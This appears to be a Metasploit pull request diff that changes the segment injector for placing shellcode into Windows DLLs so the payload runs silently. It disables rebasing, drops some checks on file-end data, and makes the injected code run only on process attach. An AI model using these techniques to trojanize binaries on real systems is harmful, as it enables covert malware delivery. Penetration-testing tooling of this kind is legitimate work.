### PR TITLE
Support silent shellcode injection into DLLs

### DIFF
--- a/lib/msf/core/exe/segment_injector.rb
+++ b/lib/msf/core/exe/segment_injector.rb
@@ -37,7 +37,6 @@ module Exe
         push hook_funcname
         push eax
         call [iat_GetProcAddress]
-        mov eax, [iat_CreateThread]
         lea edx, [thread_hook]
         push 0
         push 0
@@ -84,6 +83,9 @@ module Exe
       pe.mz.encoded = pe_orig.encoded[0, pe_orig.coff_offset-4]
       pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
       pe.header.time = pe_orig.header.time
+
+      # Don't rebase if we can help it since Metasm doesn't do relocations well
+      pe.optheader.dll_characts.delete("DYNAMIC_BASE")
 
       prefix = ''
       if pe.header.characteristics.include? "DLL"

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1774,4 +1774,3 @@ def self.to_vba(framework,code,opts={})
 end
 end
 end
-

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -169,21 +169,11 @@ require 'msf/core/exe/segment_injector'
     payload = win32_rwx_exec(code)
 
     # Create a new PE object and run through sanity checks
-    endjunk = true
     fsize = File.size(opts[:template])
     pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
     text = nil
-    sections_end = 0
     pe.sections.each do |sec|
       text = sec if sec.name == ".text"
-      sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
-      endjunk = false if sec.contains_file_offset?(fsize-1)
-    end
-    #also check to see if there is a certificate
-    cert_entry = pe.hdr.opt['DataDirectory'][4]
-    #if the cert is the only thing past the sections, we can handle.
-    if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
-      endjunk = false
     end
 
     #try to inject code into executable by adding a section without affecting executable behavior


### PR DESCRIPTION
Only run code on DLL_PROCESS_ATTACH, preventing infinite loop otherwise:
Added code would create thread -> calls DLL entry point -> calling added code...
